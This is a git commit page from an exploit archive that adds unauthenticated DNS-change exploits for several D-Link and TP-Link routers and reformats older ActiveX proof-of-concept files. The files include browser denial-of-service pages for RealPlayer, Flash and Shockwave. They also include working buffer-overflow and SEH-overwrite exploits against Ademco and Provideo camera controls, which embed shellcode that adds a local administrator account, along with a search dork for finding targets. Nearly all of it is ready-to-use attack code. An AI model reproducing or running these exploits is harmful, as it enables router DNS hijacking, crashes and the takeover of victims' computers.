DB: 2015-06-09

4 new exploits
This commit is contained in:
root 2015-06-09 06:38:42 +00:00
parent 6a755b7b3d
commit 82307c8cbc
14 changed files with 1158 additions and 1022 deletions

1520
files.csv

File diff suppressed because it is too large Load diff

View file

@ -0,0 +1,31 @@
D-Link DSL-2780B DLink_1.01.14
Unauthenticated Remote DNS Change
Copyright 2015 (c) Todor Donev
<todor.donev at gmail.com>
http://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg
No description for morons,
script kiddies & noobs !!
Disclaimer:
This or previous programs is for Educational
purpose ONLY. Do not use it without permission.
The usual disclaimer applies, especially the
fact that Todor Donev is not liable for any
damages caused by direct or indirect use of the
information or functionality provided by these
programs. The author or any Internet provider
bears NO responsibility for content or misuse
of these programs or any derivatives thereof.
By using these programs you accept the fact
that any damage (dataloss, system crash,
system compromise, etc.) caused by the use
of these programs is not Todor Donev's
responsibility.
Use them at your own risk!
[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1" 0&> /dev/null <&1

View file

@ -0,0 +1,31 @@
TP-Link ADSL2+ TD-W8950ND
Unauthenticated Remote DNS Change
Copyright 2015 (c) Todor Donev
<todor.donev at gmail.com>
http://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg
No description for morons,
script kiddies & noobs !!
Disclaimer:
This or previous programs is for Educational
purpose ONLY. Do not use it without permission.
The usual disclaimer applies, especially the
fact that Todor Donev is not liable for any
damages caused by direct or indirect use of the
information or functionality provided by these
programs. The author or any Internet provider
bears NO responsibility for content or misuse
of these programs or any derivatives thereof.
By using these programs you accept the fact
that any damage (dataloss, system crash,
system compromise, etc.) caused by the use
of these programs is not Todor Donev's
responsibility.
Use them at your own risk!
[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1

View file

@ -0,0 +1,39 @@
D-Link DSL-2730B AU_2.01
Authentication Bypass DNS Change
Copyright 2015 (c) Todor Donev
<todor.donev at gmail.com>
http://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg
Disclaimer:
This or previous programs is for Educational
purpose ONLY. Do not use it without permission.
The usual disclaimer applies, especially the
fact that Todor Donev is not liable for any
damages caused by direct or indirect use of the
information or functionality provided by these
programs. The author or any Internet provider
bears NO responsibility for content or misuse
of these programs or any derivatives thereof.
By using these programs you accept the fact
that any damage (dataloss, system crash,
system compromise, etc.) caused by the use
of these programs is not Todor Donev's
responsibility.
Use them at your own risk!
This security hole allows an attacker to bypass
authentication and change the DNS. When the
administrator is logged in the web management
interface, an attacker may be able to completely
bypass authentication phase and connect to the
web management interface with administrator's
credentials. This attack can also be performed
by an external attacker who connects to the
router's public IP address, if remote management
is enabled. To change the DNS without logging
into web management interface use the following URL:
http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=

View file

@ -0,0 +1,31 @@
D-Link DSL-526B ADSL2+ AU_2.01
Unauthenticated Remote DNS Change
Copyright 2015 (c) Todor Donev
<todor.donev at gmail.com>
http://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg
No description for morons,
script kiddies & noobs !!
Disclaimer:
This or previous programs is for Educational
purpose ONLY. Do not use it without permission.
The usual disclaimer applies, especially the
fact that Todor Donev is not liable for any
damages caused by direct or indirect use of the
information or functionality provided by these
programs. The author or any Internet provider
bears NO responsibility for content or misuse
of these programs or any derivatives thereof.
By using these programs you accept the fact
that any damage (dataloss, system crash,
system compromise, etc.) caused by the use
of these programs is not Todor Donev's
responsibility.
Use them at your own risk!
[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" | grep "var dns2"
var dns2 = '8.8.8.8';

View file

@ -42,6 +42,6 @@ $buffer2 .= $newret;
exec("mail -s wow -c $buffer2 root@localhost");
#EOF
# milw0rm.com [2003-06-10]
# milw0rm.com [2003-06-10]

View file

@ -212,6 +212,6 @@ sub mychomp {
$data = substr($arg, 0, length($arg) - $CRLF);
return $data;
}
# milw0rm.com [2003-06-08]
# milw0rm.com [2003-06-08]

View file

@ -1,50 +1,50 @@
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
RealPlayer 10.5 ierpplug.dll multiple methods Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<object classid='clsid:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5' id='RealPlayer'></object>
<select style="width: 404px" name="Pucca">
<option value = "GetComponentVersion">GetComponentVersion</option>
<option value = "HandleAction">HandleAction</option>
<option value = "DoAutoUpdateRequest">DoAutoUpdateRequest</option>
<option value = "Quoting">Quoting...</option>
</select>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language='vbscript'>
Sub tryMe
on error resume next
if Pucca.value="GetComponentVersion" then
argCount = 1
arg1=String(1000000, "A")
RealPlayer.GetComponentVersion arg1
elseif Pucca.value="HandleAction" then
argCount = 1
arg1=String(1000000, "A")
RealPlayer.HandleAction arg1
elseif Pucca.value = "DoAutoUpdateRequest" then
argCount = 3
arg1=1
arg2=String(1000000, "A")
arg3=1
RealPlayer.DoAutoUpdateRequest arg1 ,arg2 ,arg3
else
MsgBox "And the beast shall come forth surrounded by a roiling cloud of vengeance." & vbCrLf & _
"The house of the unbelievers shall be razed and they shall be scorched to the earth." & vbCrLf &_
"Their tags shall blink until the end of days."
end if
End Sub
</script>
</span></span>
</code></pre>
# milw0rm.com [2006-12-28]
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
RealPlayer 10.5 ierpplug.dll multiple methods Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<object classid='clsid:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5' id='RealPlayer'></object>
<select style="width: 404px" name="Pucca">
<option value = "GetComponentVersion">GetComponentVersion</option>
<option value = "HandleAction">HandleAction</option>
<option value = "DoAutoUpdateRequest">DoAutoUpdateRequest</option>
<option value = "Quoting">Quoting...</option>
</select>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language='vbscript'>
Sub tryMe
on error resume next
if Pucca.value="GetComponentVersion" then
argCount = 1
arg1=String(1000000, "A")
RealPlayer.GetComponentVersion arg1
elseif Pucca.value="HandleAction" then
argCount = 1
arg1=String(1000000, "A")
RealPlayer.HandleAction arg1
elseif Pucca.value = "DoAutoUpdateRequest" then
argCount = 3
arg1=1
arg2=String(1000000, "A")
arg3=1
RealPlayer.DoAutoUpdateRequest arg1 ,arg2 ,arg3
else
MsgBox "And the beast shall come forth surrounded by a roiling cloud of vengeance." & vbCrLf & _
"The house of the unbelievers shall be razed and they shall be scorched to the earth." & vbCrLf &_
"Their tags shall blink until the end of days."
end if
End Sub
</script>
</span></span>
</code></pre>
# milw0rm.com [2006-12-28]

View file

@ -1,23 +1,23 @@
<!--
--------------------------------------------------------------------------
Macromedia Flash 8 (Flash8b.ocx) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
---------------------------------------------------------------------------
-->
<html>
<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='Flash8b'></object>
<script language='vbscript'>
argCount = 1
arg1=String(1000000, "A")
Flash8b.AllowScriptAccess=arg1
</script>
# milw0rm.com [2006-12-29]
<!--
--------------------------------------------------------------------------
Macromedia Flash 8 (Flash8b.ocx) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
---------------------------------------------------------------------------
-->
<html>
<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='Flash8b'></object>
<script language='vbscript'>
argCount = 1
arg1=String(1000000, "A")
Flash8b.AllowScriptAccess=arg1
</script>
# milw0rm.com [2006-12-29]

View file

@ -1,23 +1,23 @@
<!--
---------------------------------------------------------------------------
Macromedia Shockwave 10 (SwDir.dll) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
---------------------------------------------------------------------------
-->
<html>
<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='ShockW'></object>
<script language='vbscript'>
argCount = 1
arg1=String(1000000, "A")
ShockW.swURL = arg1
</script>
# milw0rm.com [2006-12-29]
<!--
---------------------------------------------------------------------------
Macromedia Shockwave 10 (SwDir.dll) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
---------------------------------------------------------------------------
-->
<html>
<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='ShockW'></object>
<script language='vbscript'>
argCount = 1
arg1=String(1000000, "A")
ShockW.swURL = arg1
</script>
# milw0rm.com [2006-12-29]

View file

@ -1,25 +1,25 @@
<!--
-----------------------------------------------------------------------------------------------------------
BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------------------------------------
-->
<html>
<object classid='clsid:19E6E148-BAEC-11D2-B03A-EAFC20524153' id='CCRP_BDc'></object>
<script language='vbscript'>
argCount = 1
arg1=String(2000000, "A")
CCRP_BDc.SelectedFolder = arg1
</script>
<script language='javascript'>
document.location.reload()
</script>
# milw0rm.com [2007-01-18]
<!--
-----------------------------------------------------------------------------------------------------------
BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------------------------------------
-->
<html>
<object classid='clsid:19E6E148-BAEC-11D2-B03A-EAFC20524153' id='CCRP_BDc'></object>
<script language='vbscript'>
argCount = 1
arg1=String(2000000, "A")
CCRP_BDc.SelectedFolder = arg1
</script>
<script language='javascript'>
document.location.reload()
</script>
# milw0rm.com [2007-01-18]

View file

@ -1,62 +1,62 @@
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
Macromedia SwDir.dll ver. 10.1.4.20 multiple methods Stack Overflow
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='Shockwave' style="WIDTH: 0px; HEIGHT: 0px" ></object>
<select style="width: 404px" name="Pucca">
<option value = "BGCOLOR">BGCOLOR</option>
<option value = "SRC">SRC</option>
<option value = "AutoStart">AutoStart</option>
<option value = "Sound">Sound</option>
<option value = "DrawLogo">DrawLogo</option>
<option value = "DrawProgress">DrawProgress</option>
<option value = "Quoting">Quoting...</option>
</select>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language='vbscript'>
Sub tryMe
on error resume next
if Pucca.value="BGCOLOR" then
argCount = 1
arg1=String(1000000, "A")
Shockwave.BGCOLOR = arg1
elseif Pucca.value="SRC" then
argCount = 1
arg1=String(1000000, "A")
Shockwave.SRC = arg1
elseif Pucca.value = "AutoStart" then
argCount = 1
arg1=String(1000000, "A")
Shockwave.AutoStart = arg1
elseif Pucca.value = "Sound" then
argCount = 1
arg1=String(1000000, "A")
Shockwave.Sound = arg1
elseif Pucca.value = "DrawLogo" then
argCount = 1
arg1=String(1000000, "A")
Shockwave.DrawLogo = arg1
elseif Pucca.value = "DrawProgress" then
argCount = 1
arg1=String(1000000, "A")
Shockwave.DrawProgress = arg1
else
MsgBox "Hence to fight and conquer in all your battles is not supreme excellence;" & vbCrLf & _
"supreme excellence consists in breaking the enemy's resistance without fighting."
end if
End Sub
</script>
</span></span>
</code></pre>
# milw0rm.com [2007-03-07]
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
Macromedia SwDir.dll ver. 10.1.4.20 multiple methods Stack Overflow
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='Shockwave' style="WIDTH: 0px; HEIGHT: 0px" ></object>
<select style="width: 404px" name="Pucca">
<option value = "BGCOLOR">BGCOLOR</option>
<option value = "SRC">SRC</option>
<option value = "AutoStart">AutoStart</option>
<option value = "Sound">Sound</option>
<option value = "DrawLogo">DrawLogo</option>
<option value = "DrawProgress">DrawProgress</option>
<option value = "Quoting">Quoting...</option>
</select>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language='vbscript'>
Sub tryMe
on error resume next
if Pucca.value="BGCOLOR" then
argCount = 1
arg1=String(1000000, "A")
Shockwave.BGCOLOR = arg1
elseif Pucca.value="SRC" then
argCount = 1
arg1=String(1000000, "A")
Shockwave.SRC = arg1
elseif Pucca.value = "AutoStart" then
argCount = 1
arg1=String(1000000, "A")
Shockwave.AutoStart = arg1
elseif Pucca.value = "Sound" then
argCount = 1
arg1=String(1000000, "A")
Shockwave.Sound = arg1
elseif Pucca.value = "DrawLogo" then
argCount = 1
arg1=String(1000000, "A")
Shockwave.DrawLogo = arg1
elseif Pucca.value = "DrawProgress" then
argCount = 1
arg1=String(1000000, "A")
Shockwave.DrawProgress = arg1
else
MsgBox "Hence to fight and conquer in all your battles is not supreme excellence;" & vbCrLf & _
"supreme excellence consists in breaking the enemy's resistance without fighting."
end if
End Sub
</script>
</span></span>
</code></pre>
# milw0rm.com [2007-03-07]

View file

@ -1,51 +1,51 @@
<!--
IE 6 / Ademco, co., ltd. ATNBaseLoader100 Module ATNBaseLoader100.dll (5, 4, 0, 6)
remote buffer overflow exploit / XP SP2 it version
by rgod
site: retrogod.altervista.org
this activex is installed browsing some webcam pages
try this google dork:
intitle:"Browser Launch Page"
(dork credit: dragg, found in GHDB)
object safety report:
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
here it is what happen, EIP is overwritten after 272 chars passed to
Send485CMD method:
EAX 00000001
ECX 0013EA7C ASCII "AAAA ...
EDX 7EFF00E4
EBX 10007414
ESP 0013EB98 ASCII "AAAA ...
EBP 41414141
ESI 0018022C
EDI 00000000
EIP 41414141
SetLoginID, AddSite, SetScreen, SetVideoServer methods are also vulnerable
to less convenient overflows or seh overwrite
-->
<HTML>
<OBJECT CLASSID='clsid:4C1AB3D8-8107-4BC8-AEEE-38ECF8A94A12' ID='BaseRunner' ></OBJECT>
<script language='vbscript'>
'metasploit one, 456 bytes - cmd /c net user su tzu /add & net localgroup Administrators su /add
SCODE = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44") + NOP
NOP= String(12, unescape("%90"))
EIP= unescape("%03%78%41%7e") 'call ESP user32.dll
SunTzu=String(272, "A") + EIP + NOP + SCODE
BaseRunner.Send485CMD SunTzu
</script>
</HTML>
# milw0rm.com [2007-05-26]
<!--
IE 6 / Ademco, co., ltd. ATNBaseLoader100 Module ATNBaseLoader100.dll (5, 4, 0, 6)
remote buffer overflow exploit / XP SP2 it version
by rgod
site: retrogod.altervista.org
this activex is installed browsing some webcam pages
try this google dork:
intitle:"Browser Launch Page"
(dork credit: dragg, found in GHDB)
object safety report:
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
here it is what happen, EIP is overwritten after 272 chars passed to
Send485CMD method:
EAX 00000001
ECX 0013EA7C ASCII "AAAA ...
EDX 7EFF00E4
EBX 10007414
ESP 0013EB98 ASCII "AAAA ...
EBP 41414141
ESI 0018022C
EDI 00000000
EIP 41414141
SetLoginID, AddSite, SetScreen, SetVideoServer methods are also vulnerable
to less convenient overflows or seh overwrite
-->
<HTML>
<OBJECT CLASSID='clsid:4C1AB3D8-8107-4BC8-AEEE-38ECF8A94A12' ID='BaseRunner' ></OBJECT>
<script language='vbscript'>
'metasploit one, 456 bytes - cmd /c net user su tzu /add & net localgroup Administrators su /add
SCODE = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44") + NOP
NOP= String(12, unescape("%90"))
EIP= unescape("%03%78%41%7e") 'call ESP user32.dll
SunTzu=String(272, "A") + EIP + NOP + SCODE
BaseRunner.Send485CMD SunTzu
</script>
</HTML>
# milw0rm.com [2007-05-26]

View file

@ -1,24 +1,24 @@
<!-- IE6 / Provideo Camimage class (ISSCamControl.dll 1.0.1.5)
remote seh overwrite exploit / win2k sp4
tried the SD-222VPRO camera series,you can reach an online demo here:
http://www.provideo.com.tw/security%20live%20demo.htm
rgod
-->
<HTML>
<object classid='clsid:AA0FB75C-C50E-47B6-B7E0-3B9C3FAA8AC4' id='Camimage' /></object>
<script language='vbscript'>
REM metasploit one, add a user 'su' with pass 'tzu'
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44") + NOP
seh_handler = unescape("%1e%16%e6%77") : REM 0x77e6161e call edi user32.dll
nop = string(96,unescape("%90"))
suntzu = "http://www." + String(97,"a") + seh_handler + nop + shellcode + nop + ".com"
Camimage.URL = suntzu
</script>
</HTML>
# milw0rm.com [2007-06-02]
<!-- IE6 / Provideo Camimage class (ISSCamControl.dll 1.0.1.5)
remote seh overwrite exploit / win2k sp4
tried the SD-222VPRO camera series,you can reach an online demo here:
http://www.provideo.com.tw/security%20live%20demo.htm
rgod
-->
<HTML>
<object classid='clsid:AA0FB75C-C50E-47B6-B7E0-3B9C3FAA8AC4' id='Camimage' /></object>
<script language='vbscript'>
REM metasploit one, add a user 'su' with pass 'tzu'
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44") + NOP
seh_handler = unescape("%1e%16%e6%77") : REM 0x77e6161e call edi user32.dll
nop = string(96,unescape("%90"))
suntzu = "http://www." + String(97,"a") + seh_handler + nop + shellcode + nop + ".com"
Camimage.URL = suntzu
</script>
</HTML>
# milw0rm.com [2007-06-02]